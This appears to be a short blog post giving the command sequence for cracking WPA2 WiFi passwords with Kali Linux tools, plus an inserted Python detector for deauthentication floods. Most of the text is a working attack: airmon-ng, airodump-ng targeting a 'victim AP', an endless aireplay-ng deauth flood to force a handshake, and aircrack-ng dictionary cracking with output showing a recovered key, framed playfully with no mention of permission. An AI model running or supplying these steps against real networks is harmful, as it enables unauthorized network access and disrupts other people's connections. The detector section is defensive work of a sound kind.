Dec 04, 2020
2 mins read
Wazzzaaaap WiFi hackers! Here is the command gist of the "Crack WPA2 with Kali Linux" writeup I wrote in the Hacker Realm on Sudorealm.com.
Setup
Connect your wireless card, dude, don't forget that!
Check that it is connected: ifconfig wlan0 or iwconfig wlan0
Put the Card on Monitor Mode
root@kali:~# airmon-ng start wlan0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
PID Name
448 NetworkManager
525 dhclient
654 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. TP-Link TL-WN322G v3 / TL-WN422G v2 802.11g [Atheros AR9271]
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Then check that you are in monitor mode with iwconfig wlan0mon
Sniffing the air for targets
airodump-ng wlan0mon
Wait until your target pops up on the list and press Ctrl+C to stop the monitoring.
Start targeted monitoring of your victim AP
airodump-ng --bssid 50:C7:BF:DC:4C:E8 -c 11 wlan0mon -w sudorealm
Do not Ctrl+C this one; you want it running until you catch a handshake.
Your target's BSSID and channel were displayed in the generic monitoring you did before.
-w sudorealm writes the monitoring results to several files with that prefix. The one you want is sudorealm-01.cap, which will hold the captured handshake.
Deauthenticate victim to force a handshake Capture
In a new terminal window:
aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 wlan0mon
13:43:26 Waiting for beacon frame (BSSID: 50:C7:BF:DC:4C:E8) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
13:43:26 Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:26 Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:27 Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:27 Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:28 Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
With -0 0 the deauth frames are sent indefinitely; changing it to -0 20 sends 20 bursts and stops, which is usually enough to force the victim to disconnect and reconnect.
Now wait until the other terminal shows this:
CH 11 ][ Elapsed: 7 mins ][ 2019-02-22 13:43 ][ WPA handshake: 50:C7:BF:DC:4C:E8
That is the WPA handshake of the victim AP. You are set.
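The burst shown above (reason code 7 deauthentication frames to the broadcast address, several per second) is exactly the pattern a wireless IDS watches for. As an added example that is not part of the original writeup, here is a small Python detector that parses bare 802.11 management frames and flags a BSSID whose broadcast deauth rate crosses a threshold; the frames, the client and second AP addresses, and the window/threshold values are constructed assumptions, only the AP BSSID and timestamp come from the log above.

```python
import struct
from collections import defaultdict

BROADCAST = "FF:FF:FF:FF:FF:FF"
DEAUTH = 12  # management frame (type 0), subtype 12 = Deauthentication

def _mac_bytes(mac): return bytes.fromhex(mac.replace(":", ""))
def _mac_str(b): return ":".join(f"{x:02X}" for x in b)

def build_mgmt_frame(subtype, dst, src, bssid, body=b""):
    """Constructed 802.11 management frame (no radiotap): FC(2) Duration(2) dst src bssid SeqCtl(2) body."""
    fc = bytes([subtype << 4, 0x00])  # frame-control type bits 2-3 = 00 (management)
    return fc + b"\x00\x00" + _mac_bytes(dst) + _mac_bytes(src) + _mac_bytes(bssid) + b"\x00\x00" + body

def parse_mgmt_frame(raw):
    """Return (subtype, dst, src, bssid, reason_code) for a management frame, else None."""
    if len(raw) < 24 or ((raw[0] >> 2) & 0x3) != 0:
        return None
    subtype = (raw[0] >> 4) & 0xF
    reason = struct.unpack_from("<H", raw, 24)[0] if subtype == DEAUTH and len(raw) >= 26 else None
    return subtype, _mac_str(raw[4:10]), _mac_str(raw[10:16]), _mac_str(raw[16:22]), reason

def detect_deauth_flood(capture, window_s=2.0, threshold=5):
    """capture: [(ts_seconds, raw_frame)]. Flag every BSSID sending >= threshold broadcast deauths
    inside any window_s seconds (the 'aireplay-ng -0' pattern: 5 in ~2 s above). Returns {bssid: peak}."""
    stamps = defaultdict(list)
    for ts, raw in capture:
        parsed = parse_mgmt_frame(raw)
        if parsed and parsed[0] == DEAUTH and parsed[1] == BROADCAST:
            stamps[parsed[3]].append(ts)
    alerts = {}
    for bssid, times in stamps.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

def sample_capture():
    """Constructed capture modelled on the run above: code-7 broadcast deauths from the AP every
    0.5 s, plus a beacon and a unicast deauth (code 3) from an unrelated, made-up AP."""
    ap, client, other = "50:C7:BF:DC:4C:E8", "AA:BB:CC:00:11:22", "00:11:22:33:44:55"
    t0 = 13 * 3600 + 43 * 60 + 26  # 13:43:26, the timestamp in the log above
    cap = [(t0 + i * 0.5, build_mgmt_frame(DEAUTH, BROADCAST, ap, ap, struct.pack("<H", 7))) for i in range(6)]
    cap.append((t0 + 1.0, build_mgmt_frame(8, BROADCAST, other, other)))  # subtype 8 = Beacon, ignored
    cap.append((t0 + 1.5, build_mgmt_frame(DEAUTH, client, other, other, struct.pack("<H", 3))))
    return cap
```

Only broadcast deauths are counted because a legitimate AP deauthenticates a single misbehaving client, not everyone at once; feed it frames from your own monitor-mode capture to see how often your network is hit.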
Dictionary Attack to crack the Handshake
aircrack-ng sudorealm-01.cap -w Desktop/sudorealm.txt
This supposes you have some dictionaries somewhere on your system. If you don't, here is a good start:
git clone https://github.com/danielmiessler/SecLists.git
Google that a bit and you'll thank me later.
[00:00:00] 4/20 keys tested (316.73 k/s)
Time left: 0 seconds 20.00%
KEY FOUND! [ sudorealmRulez ]
Master Key : C3 3E A1 D6 E5 9E 58 66 B2 20 3E AC 27 90 44 E2
06 17 91 76 B7 98 A7 3C 9D 61 67 32 99 95 72 0E
Transient Key : EF 0B 80 7E 59 5A F4 15 51 4C 48 F8 62 7F 81 E7
D8 E7 3F E3 0A D4 2C 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : D5 D4 EB 86 16 33 4F FC 2C 74 3C E6 DB AF 81 70
The password is cracked, we are happy, and it's time for net surfing!
Bam Boom hacked! Leave your comments below or find me at:
https://www.reddit.com/user/stantz16 | The front page of the internet.
https://twitter.com/DevThanos | The one that got hacked good.
https://www.linkedin.com/in/athanasios-stantzouris-34ba44141/ | Facebook but not Facebook.
Thanks y'all!
